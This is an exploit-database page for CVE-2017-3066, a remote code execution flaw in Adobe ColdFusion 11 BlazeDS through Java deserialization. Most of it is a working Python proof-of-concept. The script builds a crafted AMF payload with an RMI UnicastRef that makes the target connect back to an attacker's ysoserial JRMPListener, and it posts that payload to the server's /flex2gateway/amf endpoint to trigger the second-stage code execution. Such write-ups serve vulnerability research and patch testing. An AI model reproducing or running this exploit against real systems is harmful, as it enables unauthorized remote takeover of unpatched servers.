Adobe Coldfusion 11.0.03.292866 BlazeDS Java Object Deserialization Remote Code Execution

2018.02.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-502


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE # Date: February 6, 2018 # Exploit Author: Faisal Tameesh (@DreadSystems) # Company: Depth Security (https://depthsecurity.com) # Version: Adobe Coldfusion (11.0.03.292866) # Tested On: Windows 10 Enterprise (10.0.15063) # CVE: CVE-2017-3066 # Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html # Category: remote # Notes: # This is a two-stage deserialization exploit. The code below is the first stage. # You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port. # After firing this exploit, and once the target server connects back, # JRMPListener will deliver the secondary payload for RCE. import struct import sys import requests if len(sys.argv) != 5: print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port" quit() target_IP = sys.argv[1] target_port = sys.argv[2] callback_IP = sys.argv[3] callback_port = sys.argv[4] amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \ '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \ struct.pack('>I', int(callback_port)) + \ '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'; url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf" headers = {'Content-Type': 'application/x-amf'} response = requests.post(url, headers=headers, data=amf_payload, verify=False)


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top